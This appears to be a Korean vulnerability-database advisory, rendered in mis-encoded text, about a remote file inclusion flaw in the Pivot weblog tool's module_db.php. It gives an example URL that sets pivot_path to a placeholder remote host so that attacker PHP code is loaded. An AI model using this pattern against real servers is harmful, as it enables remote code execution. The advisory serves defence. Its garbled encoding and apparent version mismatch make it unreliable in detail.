Ãë¾àÁ¡ID |
21311 |
À§Çèµµ |
40 |
Æ÷Æ® |
80, ... |
ÇÁ·ÎÅäÄÝ |
TCP |
ºÐ·ù |
CGI |
»ó¼¼¼³¸í |
ÇØ´ç Pivot ¼ÒÇÁÆ®¿þ¾î´Â 'module_db.php' ÆÄÀÏ¿¡ ¿ø°ÝÁö ÆÄÀÏ Æ÷ÇÔ Ãë¾àÁ¡À» °¡Áö°í ÀÖ´Ù. PivotÀº µ¥ÀÌÅͺ£À̽º°¡ ºÒÇÊ¿äÇÑ À¥ ·Î±×(Weblog) »ý¼º ¾ÖÇø®ÄÉÀ̼ÇÀÌ´Ù. ÀϺΠPivot ¹öÀü¿¡´Â ÆÄÀÏ Æ÷ÇÔ ÇÔ¼ö È£Ãâ¿¡ ÆÄ¶ó¹ÌÅͷμ »ç¿ëÀÚ ÀÔ·ÂÀ» ³Ñ±â±â Àü¿¡, »ç¿ëÀÚ ÀԷ¿¡ ´ëÇÑ ÀûÀýÇÑ ÇÊÅ͸µÀ» ÇÏÁö ¾Ê´Â °áÇÔÀ¸·Î ÀÎÇÏ¿© ¿ø°ÝÁö °ø°ÝÀÚ°¡ ¿øÇÏ´Â ÀÓÀÇÀÇ ÆÄÀÏÀ̳ª php Äڵ带 Æ÷ÇÔ½Ãų ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù. ¿ø°ÝÁö °ø°ÝÀÚµéÀº ´ÙÀ½°ú °°ÀÌ ´Ù¸¥ ¿ø°ÝÁö ½Ã½ºÅÛ »óÀÇ ¾ÇÀÇÀûÀÎ ÆÄÀÏÀ» ¸í½ÃÇϱâ À§ÇØ ÆÄ¶ó¹ÌÅͷμ path º¯¼ö¸¦ »ç¿ëÇÏ¿© module_db.php ÆÄÀÏ¿¡ Àß Á¶ÀÛµÈ URL ¿äûÀ» Àü´ÞÇÏ´Â ¹æ¹ýÀ¸·Î ·ÎÄà ½Ã½ºÅÛÀÇ ±ÇÇÑÀ» °¡Áö°í ½Ã½ºÅÛ »ó¿¡¼ ÀÓÀÇÀÇ Äڵ带 ½ÇÇàÇÒ ¼ö ÀÖ´Ù.
http://[target_server]/pivot/modules/module_db.php?pivot_path=http://xxxxxxxxxx/
* Âü°í »çÀÌÆ®: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html
* ¿µÇâÀ» ¹Þ´Â Ç÷§Æû: Pivot Web Log Tool 1.14 ¹Ì¸¸ ¹öÀüµé ¸ðµç ¿î¿µÃ¼Á¦ ¸ðµç ¹öÀü |
ÇØ°áÃ¥ |
´ÙÀ½ÀÇ Pivot À¥ »çÀÌÆ®¸¦ ÂüÁ¶ÇÏ¿© PivotÀÇ °¡Àå ÃֽйöÀü(1.4.1 ȤÀº ÀÌÈÄ)À» ±¸ÇÏ¿© ¾÷±×·¹À̵åÇÏ¿©¾ß ÇÑ´Ù: https://sourceforge.net/project/showfiles.php?group_id=67653&package_id=65955&release_id=245757
Àӽà Á¶Ä¡¹æ¹ýÀ¸·Î, ´ÙÀ½ÀÇ Full-Disclosure ¸ÞÀϸµ ¸®½ºÆ®¿¡ 2004³â 6¿ù 14ÀÏ(¿ù¿äÀÏ) 15:59:58 CDT ¿¡ °Ô½ÃµÈ ³»¿ëÀ» ÂüÁ¶ÇÏ¿© ºñ°ø½ÄÀûÀÎ ÆÐÄ¡¸¦ Àû¿ëÇÒ ¼ö ÀÖ´Ù: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html |
°ü·Ã URL |
(CVE) |
°ü·Ã URL |
10553 (SecurityFocus) |
°ü·Ã URL |
16418 (ISS) |
|